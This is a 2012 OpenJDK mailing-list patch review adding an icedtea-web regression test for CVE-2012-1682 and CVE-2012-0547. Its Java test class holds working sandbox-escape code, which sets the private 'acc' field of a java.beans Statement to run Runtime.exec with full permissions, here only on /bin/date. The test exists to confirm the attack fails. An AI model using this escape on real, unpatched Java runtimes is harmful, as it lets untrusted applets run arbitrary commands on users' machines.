[rfc][icedtea-web] Reproducer of BeansStatement behaviour

Jiri Vanek jvanek at redhat.com
Mon Dec 17 08:21:30 PST 2012


On 12/14/2012 09:58 PM, Adam Domurad wrote:
> On 12/13/2012 11:35 AM, Jiri Vanek wrote:
>> Ok for head?
>>
>> J.
>
> I'm assuming this is OK for the repo since this has been made public before. To be exact though this
> is testing a property of the JRE.
>
>> diff -r 855087771e7e
>> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploit.html
>> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploit.html  Mon Sep
>> 03 16:04:41 2012 +0200
>> @@ -0,0 +1,42 @@
>> +<!--
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or modify
>> +it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation; either version 2, or (at your option)
>> +any later version.
>> +
>> +IcedTea is distributed in the hope that it will be useful, but
>> +WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING.  If not, write to the
>> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library.  Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module.  An independent module is a module which is not derived from
>> +or based on this library.  If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so.  If you do not wish to do so, delete this
>> +exception statement from your version.
>> +
>> + -->
>> +<html><head></head><body bgcolor="blue">
>> +<p><applet code="GondvvMinimal2.class" archive="BeansStatementExploit.jar" codebase="."
>> width="100" height="20">
>> +</applet></p>
>> +</body>
>> +</html>
>> diff -r 855087771e7e
>> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitApplet.jnlp
>
> Maybe 'BeansStatementBreakSandbox' would be a bit clearer.
>
>> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitApplet.jnlp
>>  Mon Sep 03 16:04:41 2012 +0200
>> @@ -0,0 +1,61 @@
>> +<!--
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or modify
>> +it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation; either version 2, or (at your option)
>> +any later version.
>> +
>> +IcedTea is distributed in the hope that it will be useful, but
>> +WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING.  If not, write to the
>> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library.  Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module.  An independent module is a module which is not derived from
>> +or based on this library.  If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so.  If you do not wish to do so, delete this
>> +exception statement from your version.
>> +
>> + -->
>> +<?xml version="1.0" encoding="utf-8"?>
>> +<jnlp spec="1.0" href="BeansStatementExploitApplet.jnlp" codebase=".">
>> +    <information>
>> +        <title>BeansStatementExploitApplet</title>
>> +        <vendor>IcedTea</vendor>
>> +        <homepage href="http://icedtea.classpath.org/wiki/IcedTea-Web#Testing_IcedTea-Web"/>
>> + <description>BeansStatementExploitApplet</description>
>> +        <offline/>
>> +    </information>
>> +    <resources>
>> +        <j2se version="1.6+"/>
>> +        <jar href="BeansStatementExploit.jar"/>
>> +    </resources>
>> +    <applet-desc
>> +      documentBase="."
>> +      name="BeansStatementExploitApplet"
>> +      main-class="GondvvMinimal2"
>> +      width="100"
>> +      height="100">
>> +    </applet-desc>
>> +</jnlp>
>> +
>> +
>> +</applet-desc>
>> diff -r 855087771e7e
>> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitWS.jnlp
>> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitWS.jnlp  Mon
>> Sep 03 16:04:41 2012 +0200
>> @@ -0,0 +1,56 @@
>> +<!--
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or modify
>> +it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation; either version 2, or (at your option)
>> +any later version.
>> +
>> +IcedTea is distributed in the hope that it will be useful, but
>> +WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING.  If not, write to the
>> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library.  Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module.  An independent module is a module which is not derived from
>> +or based on this library.  If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so.  If you do not wish to do so, delete this
>> +exception statement from your version.
>> +
>> + -->
>> +<?xml version="1.0" encoding="utf-8"?>
>> +<jnlp spec="1.0" href="BeansStatementExploitWS.jnlp" codebase=".">
>> +    <information>
>> +        <title>BeansStatementExploitWS</title>
>> +        <vendor>IcedTea</vendor>
>> +        <homepage href="http://icedtea.classpath.org/wiki/IcedTea-Web#Testing_IcedTea-Web"/>
>> + <description>BeansStatementExploitWS</description>
>> +        <offline/>
>> +    </information>
>> +    <resources>
>> +        <j2se version="1.6+"/>
>> +        <jar href="BeansStatementExploit.jar"/>
>> +    </resources>
>> +  <application-desc main-class="GondvvTestcase4">
>> +  </application-desc>
>> +</jnlp>
>> +
>> +
>> +</applet-desc>
>> diff -r 855087771e7e tests/reproducers/simple/BeansStatementExploit/srcs/GondvvMinimal2.java
>> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/srcs/GondvvMinimal2.java  Mon Sep 03 16:04:41
>> 2012 +0200
>> @@ -0,0 +1,49 @@
>> +/* GondvvMinimal2.java
>> +Copyright (C) 2011 Red Hat, Inc.
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or
>> +modify it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation, version 2.
>> +
>> +IcedTea is distributed in the hope that it will be useful,
>> +but WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING.  If not, write to
>> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library.  Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module.  An independent module is a module which is not derived from
>> +or based on this library.  If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so.  If you do not wish to do so, delete this
>> +exception statement from your version.
>> + */
>> +
>> +import java.applet.Applet;
>> +
>> +
>> +public class GondvvMinimal2 extends Applet {
>
> I understand why you chose this name, but I would prefer something more descriptive of the intent of
> the applet.
>
>> +
>> +    @Override
>> +    public void init() {
>> +    GondvvTestcase4.main(new String[0]);
>> +
>> +    }
>> +
>> +}
>> diff -r 855087771e7e tests/reproducers/simple/BeansStatementExploit/srcs/GondvvTestcase4.java
>> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/srcs/GondvvTestcase4.java  Mon Sep 03
>> 16:04:41 2012 +0200
>> @@ -0,0 +1,181 @@
>> +/* GondvvTestcase4.java
>> +Copyright (C) 2011 Red Hat, Inc.
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or
>> +modify it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation, version 2.
>> +
>> +IcedTea is distributed in the hope that it will be useful,
>> +but WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING.  If not, write to
>> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library.  Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module.  An independent module is a module which is not derived from
>> +or based on this library.  If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so.  If you do not wish to do so, delete this
>> +exception statement from your version.
>> + */
>> +
>> +import java.beans.Statement;
>> +import java.beans.Expression;
>> +
>> +import java.lang.reflect.Field;
>> +import java.net.URL;
>> +import java.security.*;
>> +import java.security.cert.Certificate;
>> +import java.io.InputStreamReader;
>> +import java.io.BufferedReader;
>> +
>> +/**
>> + *
>> + * Summary for @
>> + * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682
>> + * and
>> + * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547
>> + */
>> +public class GondvvTestcase4 {
>> +
>> +    public static int runproc(Process proc) throws Exception {
>> +        BufferedReader cmdout = new BufferedReader(new InputStreamReader(proc.getInputStream()));
>> +        String line;
>> +        while ((line = cmdout.readLine()) != null) {
>> +            System.out.println(line);
>> +        }
>> +        proc.waitFor();
>> +        return proc.exitValue();
>> +    }
>> +
>> +    public static void runcommand_exploit(String cmd) throws Exception {
>> +        Expression exec_ex = new Expression(Runtime.getRuntime(), "exec", new String[]{cmd});
>> +
>> +        Permissions perms = new Permissions();
>> +        perms.add(new AllPermission());
>> +        ProtectionDomain protdomain = new ProtectionDomain(
>> +                new CodeSource(new URL("file:///"), new Certificate[0]), perms);
>> +        AccessControlContext acc = new AccessControlContext(new ProtectionDomain[]{protdomain});
>> +
>> +        Expression tmp_ex = new Expression(Class.class, "forName", new
>> Object[]{"sun.awt.SunToolkit"});
>> +        tmp_ex.execute();
>> +        Class toolkit = (Class) tmp_ex.getValue();
>> +
>> +        tmp_ex = new Expression(toolkit, "getField", new Object[]{Statement.class, "acc"});
>> +        tmp_ex.execute();
>> +        ((Field) tmp_ex.getValue()).set(exec_ex, acc);
>> +        exec_ex.execute();
>> +
>> +        runproc((Process) exec_ex.getValue());
>> +    }
>> +
>> +    public static void runcommand_direct(String cmd) throws Exception {
>> +        runproc(Runtime.getRuntime().exec(cmd));
>> +    }
>> +
>> +    public static void main(String[] args) {
>> +        System.out.println("Running GondvvTest");
>> +        args = new String[]{"/bin/date"};
>> +        try {
>> +            System.out.println("Directly calling: Class.forName(\"sun.awt.SunToolkit\")");
>> +
>> +            Object cl = Class.forName("sun.awt.SunToolkit");
>> +            System.out.println("FAIL: " + cl.toString());
>> +        } catch (AccessControlException e) {
>> +            System.out.println("OK: got expected: " + e.toString());
>> +        } catch (Exception e) {
>> +            System.out.println("FAIL: unexpected exception: " + e.toString());
>> +            e.printStackTrace();
>> +        }
>
> Can you move the FAIL/OK checks into the testcase class possibly ? I guess its OK as it is, but if
> you can make the testcase do more checking and not just checking for FAIL it would be good.
>
>> +        System.out.println();
>> +
>> +
>> +        try {
>> +            System.out.println("Calling: Expression(Class.class, \"forName\", new
>> String[]{\"sun.awt.SunToolkit\"})");
>> +
>> +            Expression ex = new Expression(Class.class, "forName", new
>> String[]{"sun.awt.SunToolkit"});
>> +            ex.execute();
>> +            Object cl = ex.getValue();
>> +            System.out.println("FAIL: " + cl.toString());
>> +            System.out.println();
>> +            System.out.println("Checking if SunToolkit class reference is usable");
>> +            try {
>> +                ex = new Expression(cl, "getField", new Object[]{Byte.class, "SIZE"});
>> +                ex.execute();
>> +                System.out.println("FAIL: " + ex.getValue().toString());
>> +            } catch (NoSuchMethodException e) {
>> +                System.out.println("INFO: " + e.toString());
>> +                e.printStackTrace();
>> +            } catch (Exception e) {
>> +                System.out.println("FAIL: unexpected exception: " + e.toString());
>> +                e.printStackTrace();
>> +            }
>> +
>> +            try {
>> +                ex = new Expression(cl, "getField", new Object[]{Statement.class, "acc"});
>> +                ex.execute();
>> +                System.out.println("FAIL: " + ex.getValue().toString());
>> +            } catch (NoSuchMethodException e) {
>> +                System.out.println("INFO: " + e.toString());
>> +                e.printStackTrace();
>> +            } catch (Exception e) {
>> +                System.out.println("FAIL: unexpected exception: " + e.toString());
>> +                e.printStackTrace();
>> +            }
>> +        } catch (AccessControlException e) {
>> +            System.out.println("OK: got expected: " + e.toString());
>> +        } catch (Exception e) {
>> +            System.out.println("FAIL: unexpected exception: " + e.toString());
>> +            e.printStackTrace();
>> +        }
>> +        System.out.println();
>> +
>> +        if (args.length == 0) {
>> +        }
>
> ??
>
>> +
>> +        try {
>> +            System.out.println("Running command directly: " + args[0]);
>> +            runcommand_direct(args[0]);
>> +            System.out.println("FAIL: commnad was run");
>> +        } catch (AccessControlException e) {
>> +            System.out.println("OK: got expected: " + e.toString());
>> +        } catch (Exception e) {
>> +            System.out.println("FAIL: unexpected exception: " + e.toString());
>> +            e.printStackTrace();
>> +        }
>> +        System.out.println();
>> +
>> +        try {
>> +            System.out.println("Running command using exploit: " + args[0]);
>> +            runcommand_exploit(args[0]);
>> +            System.out.println("FAIL: commnad was run");
>> +        } catch (AccessControlException e) {
>> +            System.out.println("OK: got expected: " + e.toString());
>> +        } catch (NoSuchMethodException e) {
>> +            System.out.println("FAIL: " + e.toString());
>> +            e.printStackTrace();
>> +        } catch (Exception e) {
>> +            System.out.println("FAIL: unexpected exception: " + e.toString());
>> +            e.printStackTrace();
>> +        }
>> +        System.out.println();
>
> Looks OK but again
>
>> +
>> +
>> +    }
>> +}
>> diff -r 855087771e7e
>> tests/reproducers/simple/BeansStatementExploit/testcases/BeansStatementExploitTests.java
>> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
>> +++ b/tests/reproducers/simple/BeansStatementExploit/testcases/BeansStatementExploitTests.java
>>  Mon Sep 03 16:04:41 2012 +0200
>> @@ -0,0 +1,82 @@
>> +/* BeansStatementExploitTests.java
>> +Copyright (C) 2011 Red Hat, Inc.
>> +
>> +This file is part of IcedTea.
>> +
>> +IcedTea is free software; you can redistribute it and/or
>> +modify it under the terms of the GNU General Public License as published by
>> +the Free Software Foundation, version 2.
>> +
>> +IcedTea is distributed in the hope that it will be useful,
>> +but WITHOUT ANY WARRANTY; without even the implied warranty of
>> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
>> +General Public License for more details.
>> +
>> +You should have received a copy of the GNU General Public License
>> +along with IcedTea; see the file COPYING.  If not, write to
>> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
>> +02110-1301 USA.
>> +
>> +Linking this library statically or dynamically with other modules is
>> +making a combined work based on this library.  Thus, the terms and
>> +conditions of the GNU General Public License cover the whole
>> +combination.
>> +
>> +As a special exception, the copyright holders of this library give you
>> +permission to link this library with independent modules to produce an
>> +executable, regardless of the license terms of these independent
>> +modules, and to copy and distribute the resulting executable under
>> +terms of your choice, provided that you also meet, for each linked
>> +independent module, the terms and conditions of the license of that
>> +module.  An independent module is a module which is not derived from
>> +or based on this library.  If you modify this library, you may extend
>> +this exception to your version of the library, but you are not
>> +obligated to do so.  If you do not wish to do so, delete this
>> +exception statement from your version.
>> + */
>> +
>> +import net.sourceforge.jnlp.ProcessResult;
>> +import net.sourceforge.jnlp.annotations.Bug;
>> +import net.sourceforge.jnlp.browsertesting.BrowserTest;
>> +import net.sourceforge.jnlp.browsertesting.Browsers;
>> +import net.sourceforge.jnlp.annotations.NeedsDisplay;
>> +import net.sourceforge.jnlp.annotations.TestInBrowsers;
>> +import org.junit.Assert;
>> +
>> +import org.junit.Test;
>> +
>> +public class BeansStatementExploitTests extends BrowserTest {
>> +
>> +    @Test
>> +    @NeedsDisplay
>> + @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682",
>> "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
>> +    public void BeansStatementExploitTestWS() throws Exception {
>> +        ProcessResult pr = server.executeJavawsHeadless(null, "/BeansStatementExploitWS.jnlp");
>> +        evaluate(pr);
>> +    }
>> +
>> +    @Test
>> +    @NeedsDisplay
>> + @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682",
>> "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
>> +    public void BeansStatementExploitTesWsApplet() throws Exception {
>> +        ProcessResult pr = server.executeJavawsHeadless(null, "/BeansStatementExploitApplet.jnlp");
>> +        evaluate(pr);
>> +    }
>> +
>> +    @Test
>> +    @TestInBrowsers(testIn = {Browsers.all})
>> +    @NeedsDisplay
>> + @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682",
>> "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
>> +    public void BeansStatementExploitTestApplet() throws Exception {
>> +        ProcessResult pr = server.executeBrowser("/BeansStatementExploit.html");
>> +        evaluate(pr);
>> +        Assert.assertTrue(pr.wasTerminated);
>> +    }
>> +
>> +    private void evaluate(ProcessResult pr) {
>> +        Assert.assertTrue("Output of reproducerwas empty => it was not run", (pr.stdout.length()
>> > 0));
>> +        Assert.assertTrue("Output of reproducerwas have not contained  'Running GondvvTest' => it
>> was not run", (pr.stdout.contains("Running GondvvTest")));
>> +        Assert.assertFalse("Output of reproducer contained FAIL, that means that exploit have
>> hacked your system", (pr.stdout.contains("FAIL:")));
>> +
>> +    }
>> +}
>
> Looks OK, although this seems like something that is better placed in a JRE's test suite, not ITWs.
> I have no problems with it going in the repo, though.
>
> Happy hacking,
> -Adam

Thank you for review All except FAIL/OK fixed. And for those stdouts I would rather stay with it.
I have added also listeners to speed up closing....

J.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: openjdk-exploit3-reproducer3.diff
Type: text/x-patch
Size: 22176 bytes
Desc: not available
Url : http://mail.openjdk.java.net/pipermail/distro-pkg-dev/attachments/20121217/f4c26741/openjdk-exploit3-reproducer3.diff 


More information about the distro-pkg-dev mailing list